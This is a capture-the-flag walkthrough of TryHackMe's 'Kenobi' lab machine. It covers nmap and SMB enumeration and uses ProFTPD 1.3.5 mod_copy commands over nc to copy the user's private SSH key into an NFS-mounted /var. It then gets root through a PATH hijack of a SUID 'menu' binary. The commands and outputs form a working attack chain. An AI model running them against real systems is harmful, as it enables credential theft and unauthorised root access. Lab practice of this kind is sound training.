Kenobi
Hacking For RamenKenobi is the third machine in TryHackMe’s “Offensive pentesting” path.
Enumeration
Starting with nmap scan:
nmap -sC -sV 10.10.232.217 PORT STATE SERVICE VERSION 21/tcp open ftp ProFTPD 1.3.5 22/tcp open ssh OpenSSH 7.2p2 Ubuntu 4ubuntu2.7 80/tcp open http Apache httpd 2.4.18 ((Ubuntu)) 111/tcp open rpcbind 2-4 (RPC #100000) 139/tcp open netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP) 445/tcp open netbios-ssn Samba smbd 4.3.11-Ubuntu 2049/tcp open nfs_acl 2-3 (RPC #100227)
So we have Samba on this machine. Samba is the standard Windows interoperability suite of programs for Linux and Unix. Let’s enumerate it more close with NSE scripts of nmap:
nmap -p 445 --script=smb-enum-shares.nse,smb-enum-users.nse 10.10.232.217 Starting Nmap 7.80 ( https://nmap.org ) at 2020-10-09 07:04 EDT Nmap scan report for 10.10.232.217 Host is up (0.086s latency). PORT STATE SERVICE 445/tcp open microsoft-ds Host script results: | smb-enum-shares: | account_used: guest | \\10.10.232.217\IPC$: | Type: STYPE_IPC_HIDDEN | Comment: IPC Service (kenobi server (Samba, Ubuntu)) | Users: 1 | Max Users: <unlimited> | Path: C:\tmp | Anonymous access: READ/WRITE | Current user access: READ/WRITE | \\10.10.232.217\anonymous: | Type: STYPE_DISKTREE | Comment: | Users: 0 | Max Users: <unlimited> | Path: C:\home\kenobi\share | Anonymous access: READ/WRITE | Current user access: READ/WRITE | \\10.10.232.217\print$: | Type: STYPE_DISKTREE | Comment: Printer Drivers | Users: 0 | Max Users: <unlimited> | Path: C:\var\lib\samba\printers | Anonymous access: <none> |_ Current user access: <none> |_smb-enum-users: ERROR: Script execution failed (use -d to debug) Nmap done: 1 IP address (1 host up) scanned in 6.97 seconds
Let’s connect to the \\10.10.232.217\anonymous share:
smbclient //10.10.232.217/anonymous
or you can use smbget to download the share:
smbget -R smb://10.10.232.217/anonymous
The only one file is there. By opening this file, we can learn that id_rsa file can be found at /home/kenobi/.ssh/id_rsa.
Let’s more closely look at the FTP server now. Nmap is highlighted that the ProFTPD 1.3.5 is running on port 21.
If search for the available exploits, we can find a few:
searchsploit ProFTPD 1.3.5 ProFTPd 1.3.5 - 'mod_copy' Command Execution (Metasploit)| linux/remote/37262.rb ProFTPd 1.3.5 - 'mod_copy' Remote Command Execution| linux/remote/36803.py ProFTPd 1.3.5 - File Copy| linux/remote/36742.txt
The version is matched, and we can see that mod_copy one even have the Metasploit module. But we don’t really need it. Let’s read the exploit and the official documentation instead. We can learn from it that the mod_copy module implements SITE CPFR and SITE CPTO commands, which can be used to copy files on the machine. We also the rpcbind running on the port 111, let’s enumerate it too:
nmap -p 111 --script=nfs-ls,nfs-statfs,nfs-showmount 10.10.232.217 Starting Nmap 7.80 ( https://nmap.org ) at 2020-10-09 06:42 EDT Nmap scan report for 10.10.232.217 Host is up (0.046s latency). PORT STATE SERVICE 111/tcp open rpcbind | nfs-showmount: |_ /var * Nmap done: 1 IP address (1 host up) scanned in 1.04 seconds
Great. Now we know that it’s possible to mount /var folder on the machine, and we potentially have a way to copy some files to it.
Exploitation
Connect to the port 21 with the nc and try to use mod_copy commands:
nc 10.10.232.217 21 220 ProFTPD 1.3.5 Server (ProFTPD Default Installation) [10.10.232.217] SITE CPFR /home/kenobi/.id_rsa 550 /home/kenobi/.id_rsa: No such file or directory SITE CPFR /home/kenobi/.ssh/id_rsa 350 File or directory exists, ready for destination name SITE CPTO /var/tmp/id_rsa 250 Copy successful
Awesome, we’re now have SSH key in the /var folder. Let’s mount it and grab it:
sudo mkdir /mnt/kenobiNFS sudo mount 10.10.232.217:/var /mnt/kenobiNFS ls -la /mnt/kenobiNFS total 56 drwxr-xr-x 14 root root 4096 Sep 4 2019 . drwxr-xr-x 3 root root 4096 Oct 9 06:45 .. drwxr-xr-x 2 root root 4096 Sep 4 2019 backups drwxr-xr-x 9 root root 4096 Sep 4 2019 cache drwxrwxrwt 2 root root 4096 Sep 4 2019 crash drwxr-xr-x 40 root root 4096 Sep 4 2019 lib drwxrwsr-x 2 root staff 4096 Apr 12 2016 local lrwxrwxrwx 1 root root 9 Sep 4 2019 lock -> /run/lock drwxrwxr-x 10 root crontab 4096 Sep 4 2019 log drwxrwsr-x 2 root mail 4096 Feb 26 2019 mail drwxr-xr-x 2 root root 4096 Feb 26 2019 opt lrwxrwxrwx 1 root root 4 Sep 4 2019 run -> /run drwxr-xr-x 2 root root 4096 Jan 29 2019 snap drwxr-xr-x 5 root root 4096 Sep 4 2019 spool drwxrwxrwt 6 root root 4096 Oct 9 06:34 tmp drwxr-xr-x 3 root root 4096 Sep 4 2019 www
Now we should try to use this SSH key, as we know the username too. Copy the SSH key to some folder, and add the chmod 600 to it:
cp /mnt/kenobiNFS/tmp/id_rsa . chmod 600 id_rsa ssh -i id_rsa kenobi@10.10.232.217 kenobi@kenobi:~$ whoami kenobi
PrivEsc
All the “standard” enumeration scripts will pick that up, but it’s good to know how to do things by hands.
The following command can locate all the files with SUID bit (means that they will be executed with the root permissions):
find / -perm -u=s -type f 2>/dev/null
By reviewing the output, we can say that /usr/bin/menu is standing out a bit. You can use the command strings to examine the binary:
kenobi@kenobi:~$ strings /usr/bin/menu /lib64/ld-linux-x86-64.so.2 libc.so.6 setuid __isoc99_scanf puts __stack_chk_fail printf system __libc_start_main __gmon_start__ GLIBC_2.7 GLIBC_2.4 GLIBC_2.2.5 UH-` AWAVA AUATL []A\A]A^A_ *************************************** 1. status check 2. kernel version 3. ifconfig ** Enter your choice : curl -I localhost uname -r ifconfig Invalid choice ;*3$" GCC: (Ubuntu 5.4.0-6ubuntu1~16.04.11) 5.4.0 20160609 crtstuff.c __JCR_LIST__ deregister_tm_clones __do_global_dtors_aux completed.7594 __do_global_dtors_aux_fini_array_entry frame_dummy __frame_dummy_init_array_entry menu.c __FRAME_END__ __JCR_END__ __init_array_end _DYNAMIC __init_array_start __GNU_EH_FRAME_HDR _GLOBAL_OFFSET_TABLE_ __libc_csu_fini _ITM_deregisterTMCloneTable puts@@GLIBC_2.2.5 _edata __stack_chk_fail@@GLIBC_2.4 system@@GLIBC_2.2.5 printf@@GLIBC_2.2.5 __libc_start_main@@GLIBC_2.2.5 __data_start __gmon_start__ __dso_handle _IO_stdin_used __libc_csu_init __bss_start main _Jv_RegisterClasses __isoc99_scanf@@GLIBC_2.7 __TMC_END__ _ITM_registerTMCloneTable setuid@@GLIBC_2.2.5 .symtab .strtab .shstrtab .interp .note.ABI-tag .note.gnu.build-id .gnu.hash .dynsym .dynstr .gnu.version .gnu.version_r .rela.dyn .rela.plt .init .plt.got .text .fini .rodata .eh_frame_hdr .eh_frame .init_array .fini_array .jcr .dynamic .got.plt .data .bss .comment
It’s quite messy, but don’t worry. Just read it line by line and try to make sense of it. If you try to run the binary, you will see the following:
1. status check 2. kernel version 3. ifconfig ** Enter your choice :
In the strings output, we have this chunk of code right after it:
curl -I localhost uname -r ifconfig
Noticed that it’s calling the curl without specifying the absolute path? That should ring the bell for you, as this is our way in. To move forward, you need to understand how $PATH in Linux works. That might be a good reading. Let’s do the trick:
kenobi@kenobi:/tmp$ echo /bin/bash > curl kenobi@kenobi:/tmp$ chmod 777 curl kenobi@kenobi:/tmp$ export PATH=/tmp:$PATH kenobi@kenobi:/tmp$ /usr/bin/menu *************************************** 1. status check 2. kernel version 3. ifconfig ** Enter your choice :1 To run a command as administrator (user "root"), use "sudo <command>". See "man sudo_root" for details. root@kenobi:/tmp# whoami root
Hooray! We have a root shell!
Take a second to understand what we did here. We created a file named curl with a string /bin/bash in it. We exported the /tmp folder into the $PATH variable, do the /usr/bin/menu will start to look for a binary named curl in it first. Let’s check the $PATH to make sure:
kenobi@kenobi:/tmp$ echo $PATH /tmp:/home/kenobi/bin:/home/kenobi/.local/bin:/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:/usr/games:/usr/local/games:/snap/bin
As the /usr/bin/menu is not specified the absolute path of the binary curl, it will start looking for it in each location from the $PATH. /tmp, /home/kenobi/bin, /home/kenobi/.local/bin, etc. As we have our “fake” curl inside the first folder, and the /usr/bin/menu is executing with the root privileges, we get the root shell.
Takeaway
- Enumerate every service that you have on the machine.
- Sometimes reading the documentation for the product is way faster than the exploit.
- You shouldn’t rely only on the
Metasploit, if there is aMetasploitmodule, that means you can do the same thing manually.